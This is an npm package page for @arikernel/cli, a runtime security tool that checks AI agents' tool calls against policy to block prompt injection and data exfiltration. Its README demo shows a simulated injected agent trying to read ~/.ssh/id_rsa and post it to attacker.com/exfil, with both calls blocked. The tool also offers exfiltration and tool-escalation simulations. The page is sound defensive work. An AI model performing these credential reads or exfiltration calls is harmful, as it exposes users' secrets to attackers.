npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@arikernel/cli

v0.1.2

Published

Runtime security layer for AI agents. Enforces policy on tool calls to block prompt injection and unsafe actions.

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

petermanrique101petermanrique101

Keywords

aiai-agentsai-securityagent-securityprompt-injectionruntime-securitytool-safetytaint-trackingsandboxllm

Readme

Ari Kernel CLI

Runtime security layer for AI agents — enforces policy on every tool call to block prompt injection, data exfiltration, and unsafe actions.

npm install -g @arikernel/cli
arikernel simulate prompt-injection
  ALLOWED  web_request(https://example.com)
  BLOCKED  read_file(~/.ssh/id_rsa)
           Behavioral rule triggered. Run quarantined.
  BLOCKED  http_post(https://attacker.com/exfil)
           Run in restricted mode. Egress denied.

GitHub — if this is useful, consider giving it a star.

Install

Global (recommended)

npm install -g @arikernel/cli

Then run the full forensic demo:

arikernel simulate prompt-injection
arikernel trace --latest
arikernel replay --latest --step

npx (no install)

npx @arikernel/cli --help
npx @arikernel/cli init

Local dev

git clone https://github.com/petermanrique101-sys/AriKernel.git
cd AriKernel
pnpm install
pnpm build
pnpm ari --help

Commands

| Command | Description | |---------|-------------| | arikernel simulate [type] | Run attack simulations (prompt-injection, data-exfiltration, tool-escalation) | | arikernel trace [runId] | Display security execution trace from audit log | | arikernel replay [runId] | Replay a recorded session step by step | | arikernel replay-trace <file> | Replay a JSON trace file through a fresh kernel | | arikernel sidecar | Start sidecar proxy (default port 8787) | | arikernel run | Start the firewall in run mode | | arikernel policy <file> | Validate a policy YAML file | | arikernel init | Generate a starter arikernel.policy.yaml |

All forensic commands default to ./arikernel-audit.db. Override with --db <path>.

Sidecar options

arikernel sidecar --policy ./arikernel.policy.yaml --port 8787 --audit-log ./sidecar-audit.db

Replay-trace options

arikernel replay-trace ./trace.json --verbose
arikernel replay-trace ./trace.json --preset workspace-assistant  # what-if analysis
arikernel replay-trace ./trace.json --json                        # machine-readable output

Tip: If --latest picks a stale run, delete arikernel-audit.db and re-simulate.

Requirements

  • Node.js >= 20

npm package

The package is published as @arikernel/cli. The bin field ensures the command is arikernel:

npm install -g @arikernel/cli
arikernel --help

Publish checklist

Pre-publish verification

npm whoami
npm access ls-packages

Build and test

pnpm build
pnpm test

Publish packages in dependency order

pnpm --filter @arikernel/core publish --no-git-checks
pnpm --filter @arikernel/taint-tracker publish --no-git-checks
pnpm --filter @arikernel/policy-engine publish --no-git-checks
pnpm --filter @arikernel/tool-executors publish --no-git-checks
pnpm --filter @arikernel/audit-log publish --no-git-checks
pnpm --filter @arikernel/runtime publish --no-git-checks
pnpm --filter @arikernel/attack-sim publish --no-git-checks
pnpm --filter @arikernel/adapters publish --no-git-checks
pnpm --filter @arikernel/mcp-adapter publish --no-git-checks
pnpm --filter @arikernel/sidecar publish --no-git-checks
pnpm --filter @arikernel/cli publish --no-git-checks

--no-git-checks is needed because pnpm replaces workspace:* with real versions at publish time regardless of git state. Remove it once you have a proper release workflow with changeset or similar.

Post-publish verification

npm view @arikernel/cli version license description
npm install -g @arikernel/cli
arikernel --help

Deprecate old unscoped package

npm deprecate arikernel@"*" "Package renamed to @arikernel/cli. Please install @arikernel/cli instead."
npm view arikernel version license

License

See LICENSE.md for usage terms.